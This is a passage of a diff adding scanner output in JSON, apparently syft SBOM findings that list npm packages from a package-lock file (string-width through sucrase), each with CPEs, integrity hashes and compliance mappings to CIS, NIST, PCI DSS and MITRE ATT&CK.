"Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a6a2288a986748af", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: string-width 5.1.2", + "title": "string-width 5.1.2", + "description": "Package discovered: string-width 5.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "303a44f8f6ca903e", + "name": "string-width", + "version": "5.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:string-width:string-width:5.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string-width:string_width:5.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string_width:string-width:5.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string_width:string_width:5.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string:string-width:5.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string:string_width:5.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/string-width@5.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", + "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", + "dependencies": { + "eastasianwidth": "^0.2.0", + "emoji-regex": "^9.2.2", + "strip-ansi": "^7.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d318d3d155c6a9dd", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: string_decoder 1.1.1", + "title": "string_decoder 1.1.1", + "description": "Package discovered: string_decoder 1.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "829e7f04cb28f180", + "name": "string_decoder", + "version": "1.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:string-decoder:string-decoder:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string-decoder:string_decoder:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string_decoder:string-decoder:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string_decoder:string_decoder:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string:string-decoder:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string:string_decoder:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/string_decoder@1.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "42e775567d560303", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: string_decoder 1.3.0", + "title": "string_decoder 1.3.0", + "description": "Package discovered: string_decoder 1.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "31e1990d6adabf2b", + "name": "string_decoder", + "version": "1.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:string-decoder:string-decoder:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string-decoder:string_decoder:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string_decoder:string-decoder:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string_decoder:string_decoder:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string:string-decoder:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:string:string_decoder:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/string_decoder@1.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz", + "integrity": "sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==", + "dependencies": { + "safe-buffer": "~5.2.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "611033baae4657b2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: strip-ansi 6.0.1", + "title": "strip-ansi 6.0.1", + "description": "Package discovered: strip-ansi 6.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e47d9046945afbeb", + "name": "strip-ansi", + "version": "6.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:strip-ansi:strip-ansi:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:strip-ansi:strip_ansi:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:strip_ansi:strip-ansi:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:strip_ansi:strip_ansi:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:strip:strip-ansi:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:strip:strip_ansi:6.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/strip-ansi@6.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", + "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "dependencies": { + "ansi-regex": "^5.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ca95150df82b38c3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: strip-ansi 7.2.0", + "title": "strip-ansi 7.2.0", + "description": "Package discovered: strip-ansi 7.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "efdaea275ca01865", + "name": "strip-ansi", + "version": "7.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:strip-ansi:strip-ansi:7.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:strip-ansi:strip_ansi:7.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:strip_ansi:strip-ansi:7.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:strip_ansi:strip_ansi:7.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:strip:strip-ansi:7.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:strip:strip_ansi:7.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/strip-ansi@7.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.2.0.tgz", + "integrity": "sha512-yDPMNjp4WyfYBkHnjIRLfca1i6KMyGCtsVgoKe/z1+6vukgaENdgGBZt+ZmKPc4gavvEZ5OgHfHdrazhgNyG7w==", + "dependencies": { + "ansi-regex": "^6.2.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "680b8434591c36cc", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: strnum 2.2.3", + "title": "strnum 2.2.3", + "description": "Package discovered: strnum 2.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9368f059f77a6fca", + "name": "strnum", + "version": "2.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:strnum:strnum:2.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/strnum@2.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/strnum/-/strnum-2.2.3.tgz", + "integrity": "sha512-oKx6RUCuHfT3oyVjtnrmn19H1SiCqgJSg+54XqURKp5aCMbrXrhLjRN9TjuwMjiYstZ0MzDrHqkGZ5dFTKd+zg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "71b1b284c1af24b8", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: stubs 3.0.0", + "title": "stubs 3.0.0", + "description": "Package discovered: stubs 3.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "10401a0421b092a3", + "name": "stubs", + "version": "3.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:stubs:stubs:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/stubs@3.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/stubs/-/stubs-3.0.0.tgz", + "integrity": "sha512-PdHt7hHUJKxvTCgbKX9C1V/ftOcjJQgz8BZwNfV5c4B6dcGqlpelTbJ999jBGZ2jYiPAwcX5dP6oBwVlBlUbxw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a4561300304da31c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: styled-jsx 5.1.1", + "title": "styled-jsx 5.1.1", + "description": "Package discovered: styled-jsx 5.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b71f2c964dcb79d3", + "name": "styled-jsx", + "version": "5.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:styled-jsx:styled-jsx:5.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:styled-jsx:styled_jsx:5.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:styled_jsx:styled-jsx:5.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:styled_jsx:styled_jsx:5.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:styled:styled-jsx:5.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:styled:styled_jsx:5.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/styled-jsx@5.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/styled-jsx/-/styled-jsx-5.1.1.tgz", + "integrity": "sha512-pW7uC1l4mBZ8ugbiZrcIsiIvVx1UmTfw7UkC3Um2tmfUq9Bhk8IiyEIPl6F8agHgjzku6j0xQEZbfA5uSgSaCw==", + "dependencies": { + "client-only": "0.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d085117a189c2037", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: sucrase 3.35.1", + "title": "sucrase 3.35.1", + "description": "Package discovered: sucrase 3.35.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + 